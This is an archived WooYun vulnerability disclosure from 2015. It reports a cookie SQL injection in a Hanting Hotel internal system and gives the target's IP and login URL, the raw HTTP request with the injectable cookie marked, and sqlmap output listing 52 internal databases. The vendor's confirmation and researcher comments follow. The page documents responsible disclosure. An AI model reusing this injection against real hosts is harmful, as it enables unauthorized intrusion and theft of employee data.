当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110936

漏洞标题:汉庭酒店某系统cookie注入(可获取内部员工信息)

相关厂商:汉庭酒店

漏洞作者: PgHook

提交时间:2015-04-28 22:40

修复时间:2015-06-14 12:50

公开时间:2015-06-14 12:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-30: 厂商已经确认,细节仅向厂商公开
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-14: 细节向公众公开

简要描述:

。。。。。。。

详细说明:

漏洞网站:http://112.65.142.28/HTlogin.aspx

w.jpg


http信息:

GET /bbs/login.asp HTTP/1.1
Cookie: %2Fbbs%2FGROUP=12345*; ASPSESSIONIDCSADCQBR=PEEDCNMBDHPPFKKDLEPKCNKD
Referer: http://112.65.142.28:80/bbs/admin_login.asp
Host: 112.65.142.28
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


%2Fbbs%2FGROUP 存在漏洞

9.png


available databases [52]:
[*] Application_Registry_Service_DB_5d9281593cab42dc8320efcf7cbfd7a0
[*] Bdc_Service_DB_17fc7e4144144d30bf092d46962cf618
[*] configdb
[*] dbcenter
[*] dnt31
[*] eCell6
[*] Exam1BAK
[*] HT_eProcurement
[*] HTFranchisee
[*] HtinnsAdviser
[*] HTIntranetUAT
[*] HTScore
[*] InnInspection
[*] InspectionAudit150408
[*] Managed Metadata Service_eb3ad9498f3c4d538c1c638c92230972
[*] master
[*] mdm_01
[*] model
[*] msdb
[*] OA
[*] PerformancePoint Service Application_1e41da1b1ab64e55b59c496da2baa509
[*] PnCheck
[*] PurchaseSurvey
[*] RCTIDB
[*] ReportServer
[*] ReportServerTempDB
[*] ROOMCHK
[*] Search_Service_Application_CrawlStoreDB_a4e0258f3e8d475dbc9ae62b373ce475
[*] Search_Service_Application_DB_e90bd9a6f93d43c294e41402b5d631e9
[*] Search_Service_Application_PropertyStoreDB_bda79800fee24b8691db0032d6ceccbc
[*] Secure_Store_Service_DB_b62005406e8a4f12a854cb5a434821f4
[*] SharePoint_AdminContent_5947d722-6796-4bc7-ae44-1c894454c1f5
[*] SharePoint_Config
[*] slam
[*] StateService_23c5611220344b52bea83c8d6fd7ddc8
[*] tempdb
[*] test
[*] User Profile Service Application_ProfileDB_cb8f9f4b3ec14f0ea7f125fe176a4e0f
[*] User Profile Service Application_SocialDB_6bd18e2e80804b86bc5687f722d780ab
[*] User Profile Service Application_SyncDB_c8c90e3cd266442f83f260c4b75ad735
[*] userbase_01
[*] userplus_01
[*] VHArchives_HanTing
[*] WebAnalyticsService应用程序_ReportingDB_7dc7dc51-0f26-49e6-8b74-9187ccdf0186
[*] WebAnalyticsService应用程序_StagingDB_458c6a10-f5c4-4756-a2d6-010eb6805b43
[*] WordAutomationServices_04a084d97a3d4f83af4b3667b5385333
[*] WSS_Content_90
[*] WSS_Content_96f786efb4e6401f89115ac108f5f165
[*] WSS_Content_afe21b5efe3b45be8411b39b7021ec82
[*] WSS_Content_b3117e51d8c8405888a80388555ec208
[*] WSS_Logging
[*] YunYing


漏洞证明:

w9.png

修复方案:

。。。。

版权声明:转载请注明来源 PgHook@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-30 12:49

厂商回复:

已通知相关团队跟进处理,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-28 22:58 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    还隐身,出来, 不打死你。

  2. 2015-04-28 23:11 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    @专业种田 这是隐身么??

  3. 2015-04-29 07:51 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    你俩能不秀恩爱不?